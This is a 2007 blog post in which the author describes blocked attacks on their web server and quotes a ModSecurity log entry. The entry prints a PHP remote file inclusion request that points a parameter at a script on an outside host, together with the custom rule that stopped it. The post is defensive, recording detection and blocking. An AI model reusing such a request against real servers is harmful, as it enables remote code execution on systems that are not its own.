Tuesday, January 16, 2007

I saw someone hammering my web server

I saw someone hammering my web server today and yesterday. He/she generated 196 Snort alerts, which is quite a bit for my server. The cool thing is, there was negative response to the attack for two reasons:

1. The server doesn't use PHP or CGI and the attack was designed to exploit those two software packages.

2. I use ModSecurity, which is a web server application firewall.

See payload below (ModSecurity):

Request: midas.slackware.lan 198.145.244.232 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1" 403 304 "-" "Morfeus Fucking Scanner" RawyokKgjR4AAFL7qwU "-"
----------------------------------------
GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 66.160.141.30
User-Agent: Morfeus Fucking Scanner
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev
"2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
The activity triggered a rule I created (yeah, ModSecurity is rule-based). I know I don't use PHP but I'd still like to see such attacks on my network, as a heads-up to escalated attacks. What I don't have is a reactive firewall, one that blocks traffic such as this automatically. I had to add the IP to my block list by hand, which sucks.

ModSecurity also has a web-based console that I haven't figured out how to use yet, so I usually parse the flat logs manually then correlate any malicious traffic with my firewall and Snort logs to get a better picture of questionable activity. Once I figure out how to get the web-based console up and running, I'll let you know and maybe throw together a how-to for how to utilize ModSecurity on Slackware.